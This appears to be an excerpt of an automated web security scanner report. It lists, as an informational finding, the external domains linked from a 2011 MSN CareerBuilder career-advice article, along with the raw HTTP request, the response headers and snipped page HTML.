<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032619/ns/nightly_news/">NBC Nightly News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a></li><li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech & Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a></li><li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a></li><li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/"><strong>
...[SNIP]...
<li><a href="http://thebubble.redacted/ ">Comedy</a></li><li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb"> MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote"><strong>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate & Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty & Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor & Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo: For Her</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health, Diet & Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love & Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=AP">Bing</a>
...[SNIP]...
<li class="first">
<a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg">
<a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last">
<a href="http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1178121103&rver=4.0.1532.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314">Sign in</a>
...[SNIP]...
<div id="logo">
<a href="http://www.redacted">
<img id="msnlogo" src="http://blstc.redacted/br/gbl/lg/1/t/msft.png" title="go to redacted" alt="go to redacted" />
</a>
...[SNIP]...
<div>
<a href="http://www.bing.com/search" id="wslink1">Search the web</a>
...[SNIP]...
<div id="optlinks" class="link">
<a href="http://msn.empleoscb.com/">Espa..ol</a>
...[SNIP]...
<strong>
<a href="http://careers.msn.com">Careers</a>
</strong>
<a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="partnerlogo" style="padding: 15px 0 10px 10px; font-family: Tahoma, Arial, Sans-Serif; color:#006699;">

            <img src="https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif" id="Img1" alt="CareerBuilder.com" />
            <div id="partnerlinks" style="padding: 10px 0 5px 0;">
...[SNIP]...
<li class="first"><a href="http://careers.msn.com/">Home</a>
...[SNIP]...
<li><a id="Cbhyperlink6" href="http://www.cbsalary.com/calculators.aspx?lr=cbmsn&siteid=cbmsn_3calc" target="_blank">Salary Calculators</a>
...[SNIP]...
<li><a id="Cbhyperlink19" href="http://careerpath.com/career-tests/?lr=cbmsn&siteid=cbmsnchcpath" target="_blank">Career Tests</a>
...[SNIP]...
<div class="cbmsnArticleImage"><img alt="" src="http://emj.icbdr.com/artieimages/70/ar5b5t06t3h1zsd1yx70.gif" /></div>
...[SNIP]...
</select>
                                <img src="http://img.icbdr.com/images/pixel.gif" id="qsbNEW_Img1" width="1" hspace="1" height="10" />
                            </td>
...[SNIP]...
</i><a href="http://www.theworkbuzz.com/" target="_blank"><i>
...[SNIP]...
</i><a href="https://twitter.com/CBwriterRZ" target="_blank"><i>
...[SNIP]...
<li><a href="http://www.stumbleupon.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&title=Get Paid to Socially Network"> <img border=0 src="http://www.stumbleupon.com/images/icon_su.gif" alt="StumbleUpon"> Stumble It!</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sharer.php?u=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&t=Get Paid to Socially Network"> <img border=0 src="http://static.ak.fbcdn.net/images/share/facebook_share_icon.gif" alt="Facebook"> Facebook</a>
...[SNIP]...
<li><a href="http://del.icio.us/post?noui&v=4&jump=close&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&title=Get Paid to Socially Network"> <img border=0 src="http://images.del.icio.us/static/img/delicious.small.gif" alt="del.icio.us"> del.icio.us</a>
...[SNIP]...
<li><a href="http://spaces.live.com/BlogIt.aspx?Title=Get Paid to Socially Network&SourceURL=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js"> <img border=0 src="http://sc2.sclive.net/00.0.0000.0000/Web/images/spacesicon16.gif" alt="Live Spaces"> Live Spaces</a>
...[SNIP]...
<li><a href="http://digg.com/submit?phase=2&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&title=Get Paid to Socially Network"> <img border=0 src="http://digg.com/img/digg-it-tiny-submit.gif" alt="Digg"> Digg It!</a>
...[SNIP]...
<li><a href="http://reddit.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js&title=Get Paid to Socially Network"> <img border=0 src="http://sp.reddit.com/reddithead4.gif" alt="Reddit"> reddit</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_print_icon.gif" border="0" style="margin-top: 2px;" /><a id="hlPrinterLinkNEW" onclick="javascript:window.open('/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod&pf=true', 'printerfriendly', 'w
...[SNIP]...
<a href="mailto:?body=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1951&catid=js"><img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_email_icon.gif" border="0" /> E-mail</a>
...[SNIP]...
<div style="float: left; height: 30px; line-height: 30px; margin-top: 4px !ie; _margin-top: 0;">
        <img src="http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_discuss_icon.gif" border="0" style="float: left; margin-top: 5px;" />
        <a onClick="popupDiscuss();" style="cursor: pointer;">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />


<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...
</center>
<iframe scrolling="no" width="300" height="250" marginheight="0" marginwidth="0" frameborder="0" framespacing="0" src="http://rad.redacted/ADSAdClient31.dll?GetAd?PG=CCHAPR?PS=45019?PI=7327?NC=1154?AP=1417?SC=D1"></iframe>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635">A decade of game-changing fashion moments</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=valentine%27s+day+gift+ideas&form=ap">Bing: Valentine's day gift ideas</a>
...[SNIP]...
<li><a href="http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914">10 safe and reliable cars for teens</a>
...[SNIP]...
<li><a href="http://realestate.redacted/article.aspx?cp-documentid=27225933">America's best places to raise kids</a>
...[SNIP]...
<li><a href="http://money.msn.com/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx">7 ways to overpay for car insurance</a>
...[SNIP]...
<li><a href="http://www.delish.com/food-fun/best-burgers">The 25 best burgers in the U.S.</a>
...[SNIP]...
<li><a href="http://health.msn.com/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836">Top 5 habits that harm your heart</a>
...[SNIP]...
<li class="first">
<a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li>
<a href="http://g.redacted/0TO_/enus">Legal</a>
</li>
<li>
<a href="http://advertising.redacted/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last">
<a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<li class="last">
<a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>


<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...
<noscript><img src = "http://msnportalcareers.112.2O7.net/b/ss/msnportalcareers/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.234. http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.careerbuilder.com
Path:	/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/

Issue detail

The page was loaded from a URL containing a query string:

http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.msn.com/msn
http://articles.redacted/video/default.aspx?from=en-us_msnhp
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://blstc.redacted/br/gbl/lg/1/t/msft.png
http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/6/linktracking.js
http://blstj.redacted/br/gbl/js/7/core.js
http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blstj.redacted/br/gbl/js/7/navigation.js
http://blstj.redacted/br/voodoo/js/9/core.js
http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.msn.com/mopsdk/standard/careers/msnshell.aspx&rf=
http://careerpath.com/career-tests/?lr=cbmsn&siteid=cbmsnchcpath
http://careers.redacted/
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://del.icio.us/post?noui&v=4&jump=close&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&title=Job advice that was true 20 years ago -- but not today
http://digg.com/img/digg-it-tiny-submit.gif
http://digg.com/submit?phase=2&url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&title=Job advice that was true 20 years ago -- but not today
http://download.live.com/?sku=messenger
http://editorial.autos.redacted/listarticle.aspx?cp-documentid=1176914
http://emj.icbdr.com/artieimages/8n/ar5l13j6pyt9y9p1td8n.gif
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/video/?from=en-us_msnhp
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://glo.redacted/
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://health.redacted/health-topics/quit-smoking/slideshow.aspx?cp-documentid=100268836
http://hotmail.redacted/
http://hp.redacted/scr/op/ol-fdbkv3_r1.js
http://images.del.icio.us/static/img/delicious.small.gif
http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_discuss_icon.gif
http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_email_icon.gif
http://img.icbdr.com/images/custom/msn/cbmsn_viewarticle_print_icon.gif
http://img.icbdr.com/images/pixel.gif
http://img.icbdr.com/v11.89/Common/js/cbatlascore.js
http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js
http://img.icbdr.com/v11.89/css/cbglobal.css
http://img.icbdr.com/v11.89/css/msn_full.css
http://img.icbdr.com/v11.89/css/msncareeradvice.css
http://latino.redacted/
http://lifestyle.redacted/
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26466635
http://lifestyle.redacted/your-look/video/?from=en-us_msnhp
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1178121103&rver=4.0.1532.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314
http://money.redacted/auto-insurance/7-ways-to-overpay-for-car-insurance-insure.aspx
http://moneycentral.msn.com/detail/stock_quote
http://moneycentral.msn.com/home.asp
http://moneycentral.msn.com/investor/home.aspx
http://moneycentral.msn.com/personal-finance/
http://movies.redacted/
http://movies.redacted/new-on-dvd/movies/
http://msn.empleoscb.com/
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalcareers.112.2o7.net/b/ss/msnportalcareers/1/H.1--NS/0
http://music.redacted/
http://my.redacted/
http://rad.redacted/ADSAdClient31.dll?GetAd?PG=CCHAPR?PS=45019?PI=7327?NC=1154?AP=1417?SC=D1
http://realestate.redacted/
http://realestate.redacted/article.aspx?cp-documentid=27225933
http://reddit.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&title=Job advice that was true 20 years ago -- but not today
http://rss.redacted/
http://sc2.sclive.net/00.0.0000.0000/Web/images/spacesicon16.gif
http://sp.reddit.com/reddithead4.gif
http://spaces.live.com/BlogIt.aspx?Title=Job advice that was true 20 years ago -- but not today&SourceURL=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js
http://specials.redacted/alphabet.aspx
http://static.ak.fbcdn.net/images/share/facebook_share_icon.gif
http://thebubble.redacted/
http://today.msnbc.msn.com/
http://tv.redacted/
http://wonderwall.redacted/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=AP
http://www.bing.com/search?q=how+to+request+a+job+reference&form=ap
http://www.bing.com/search?q=questions+to+ask+during+job+interview&form=ap
http://www.bing.com/search?q=valentine%27s+day+gift+ideas&form=ap
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cbsalary.com/calculators.aspx?lr=cbmsn&siteid=cbmsn_3calc
http://www.delish.com/
http://www.delish.com/food-fun/best-burgers
http://www.facebook.com/sharer.php?u=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&t=Job advice that was true 20 years ago -- but not today
http://www.redacted/
http://www.msnbc.redacted/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.msnbc.redacted/id/3032076/ns/health
http://www.msnbc.redacted/id/3032118/ns/technology_and_science
http://www.msnbc.redacted/id/3032507/ns/world_news
http://www.msnbc.redacted/id/3032525/ns/us_news
http://www.msnbc.redacted/id/3032553/ns/politics
http://www.msnbc.redacted/id/3032619/ns/nightly_news/
http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp
http://www.myhomeredacted/
http://www.stumbleupon.com/images/icon_su.gif
http://www.stumbleupon.com/submit?url=http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=2469&catid=js&title=Job advice that was true 20 years ago -- but not today
http://www.theworkbuzz.com/
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.icbdr.com/images/custom/msn/wcareerbuilder-com.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60279
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=bf80682e54774fe4947e86302bda14c6-349642141-XJ-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842739FAFB01ECDDF39935996E5361043F0FBFD5AB9C3F994B02F30A411CD12A61E74498124BB5185C8; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:49:01 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEB50
Date: Sat, 29 Jan 2011 23:49:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msncareeradvice.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msn_full.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id="reporting">
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&pi=7327&ps=45019&tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032619/ns/nightly_news/">NBC Nightly News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a></li><li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech & Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a></li><li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a></li><li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/"><strong>
...[SNIP]...
<li><a href="http://thebubble.redacted/ ">Comedy</a></li><li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb"> MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote"><strong>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate & Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty & Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor & Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo: For Her</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health, Diet & Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love & Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home"><strong>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=AP">Bing</a>
...[SNIP]...
<li class="first">
